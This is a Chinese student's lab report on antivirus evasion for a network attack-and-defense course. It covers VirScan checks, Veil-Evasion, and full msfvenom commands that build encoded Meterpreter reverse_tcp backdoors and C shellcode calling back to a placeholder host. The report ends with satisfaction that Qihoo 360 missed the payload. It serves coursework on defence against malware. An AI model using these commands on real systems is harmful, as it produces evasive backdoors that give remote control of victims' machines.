20155235 《网络攻防》 实验三 免杀原理与实践 实验报告 20155235 《网络攻防》 实验三 免杀原理与实践 实验报告

实验目的

通过本部分内容的学习,认识到杀软局限性,提高在工作生活中对于恶意软件防范能力。

实验内容

(1)用VirScan来检测后门

(2)Msfvenom使用编码器

(3)Veil-Evasion

(4)C语言调用Shellcode

实验一 用VirScan来检测后门

按理说检查的应该是实验二生成的后门,但是,我用VirScan检验后门时,出现了一个让我意想不到的情况
20155235 《网络攻防》 实验三 免杀原理与实践 实验报告
20155235 《网络攻防》 实验三 免杀原理与实践 实验报告
让我十分的震惊了

任务二 Msfvenom使用编码器

重复编码,输入
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘x00’ LHOST=[本机IP] LPORT=5235 -f exe > 5235Backdoor.exe
结果一样,内心崩溃。

任务三 Veil-Evasion

安装Veil-Evasion
因为我的虚拟机不能直接通过 sudo apt-get install 安装,所以我参考了一下周泽堃同学第三次实验博客中关于Veil-Evasion的安装方法,然而,也失败了,最后经过了一番波折,我最终选择,拷贝了其他同学下好的Veil-Evasion。
使用Veil-Evasion
输入 veil ,用 use evasion list payloads ,进入到payloads模板界面,经过一番操作后,成功生成
20155235 《网络攻防》 实验三 免杀原理与实践 实验报告
20155235 《网络攻防》 实验三 免杀原理与实践 实验报告

任务四 C语言调用Shellcode

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=[kali IP] LPORT=5235 -f c 生成C语言代码,C语言代码就不贴了
回连监听
20155235 《网络攻防》 实验三 免杀原理与实践 实验报告
20155235 《网络攻防》 实验三 免杀原理与实践 实验报告
用 VirScan检测,结果为20155235 《网络攻防》 实验三 免杀原理与实践 实验报告
20155235 《网络攻防》 实验三 免杀原理与实践 实验报告

经过5次重复编译后,用VirScan检测结果为
20155235 《网络攻防》 实验三 免杀原理与实践 实验报告
20155235 《网络攻防》 实验三 免杀原理与实践 实验报告

后记

实验成功真是可喜可贺,比较开心的是最后shellcode生成的C语言代码,无论是编译1次还是编译5次,奇虎360都没有检测出来,这让我无比的开心。但是我博客交的有些晚了,对不起老师!